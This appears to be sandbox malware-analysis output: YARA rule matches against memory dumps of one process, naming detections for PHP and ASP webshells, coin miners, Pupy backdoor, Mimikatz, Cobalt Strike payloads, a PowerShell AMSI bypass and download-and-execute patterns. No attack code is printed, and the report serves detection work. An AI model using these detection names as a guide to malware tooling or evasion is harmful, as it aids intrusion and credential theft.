Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp, type: MEMORY Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6328572357.00000197A4180000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000024.00000003.6287839327.00000197A4D21000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, type: MEMORY Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
